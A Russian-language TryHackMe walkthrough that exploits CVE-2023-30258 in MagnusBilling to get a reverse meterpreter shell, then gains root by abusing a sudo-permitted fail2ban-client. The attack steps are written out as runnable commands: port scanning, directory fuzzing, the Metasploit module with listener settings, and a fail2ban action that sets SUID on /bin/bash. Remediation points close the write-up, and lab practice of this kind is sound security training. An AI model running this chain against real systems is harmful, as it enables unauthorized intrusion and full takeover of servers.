
Пошаговое прохождение эксплуатации CVE-2023-30258 (MagnusBilling RCE) и повышения привилегий через неправильную конфигурацию fail2ban в лаборатории TryHackMe. Демонстрирует веб-перебор, эксплуатацию Metasploit и повышение привилегий в Linux.
⸻
🛡️ MagnusBilling RCE → Root (CVE-2023-30258)
📌 Обзор • Цель: 10.145.148.203 • Платформа: TryHackMe • Уязвимость: CVE-2023-30258 • Доступ: Неаутентифицированное удалённое выполнение кода (RCE) • Повышение привилегий: неверная конфигурация fail2ban • Итоговый доступ: Root
⸻
🔍 1. Разведка
Сканирование портов
rustscan -a 10.145.148.203
📊 Открытые порты
Порт Сервис
22 SSH
80 HTTP
3306 MySQL
5038 Asterisk

Наличие Asterisk намекает на VoIP/биллинговую систему.
⸻
🌐 2. Перебор веб-каталогов
Фаззинг каталогов
ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt
-u "http://10.145.148.203/mbilling/FUZZ" -ic -c
📁 Результаты: • /archive • /assets • /lib • /tmp • /protected
Путь /mbilling определён как потенциальный вектор атаки.

⸻
🚨 3. Выявление уязвимости
CVE-2023-30258
MagnusBilling уязвим к: • Неаутентифицированному удалённому выполнению кода (RCE) • Инъекции команд • Полной компрометации системы
⸻
💣 4. Эксплуатация (Metasploit)
msfconsole
search CVE:2023-30258
use exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258
set RHOSTS 10.145.148.203
set LHOST tun0
set LPORT 4444
run

⸻
🎯 Результат
meterpreter session opened
sysinfo
OS: Linux Debian User: asterisk
⸻
🔐 5. Первоначальный доступ
shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
whoami
asterisk
⸻
🏁 6. Флаг пользователя
cd /home/magnus cat user.txt
⸻
🔎 7. Повышение привилегий
Проверка sudo
sudo -l
(ALL) NOPASSWD: /usr/bin/fail2ban-client
Обнаружена критическая неверная конфигурация!
⸻
💣 8. Эксплуатация Fail2Ban
Добавление вредоносного действия
sudo fail2ban-client set mbilling_login addaction evil
sudo fail2ban-client set mbilling_login action evil actionban "chmod +s /bin/bash"
sudo fail2ban-client set mbilling_login banip 127.0.0.1
⸻
🚀 9. Доступ root
/bin/bash -p
id
euid=0(root)
Изначально whoami возвращал asterisk. Использование bash -p повышает привилегии до root.
⸻
👑 10. Флаг root
cat /root/root.txt
⸻
🧠 11. Ключевые выводы • Эксплуатация CVE обеспечила лёгкий первоначальный доступ • Перебор веб-каталогов критически важен (ffuf выявил /mbilling) • Неверно настроенный sudo может привести к полной компрометации системы • fail2ban можно использовать для повышения привилегий
⸻
🛡️ 12. Меры по устранению • Обновите MagnusBilling до последней версии • Удалите NOPASSWD из конфигурации sudo • Ограничьте доступ к fail2ban-client • Укрепите веб-приложения и конечные точки
⸻
💀 Заключение
Эта машина демонстрирует реалистичную цепочку атак:
Веб-RCE → Shell → Повышение привилегий → Root
Сочетание уязвимости и неверной конфигурации привело к полной компрометации системы.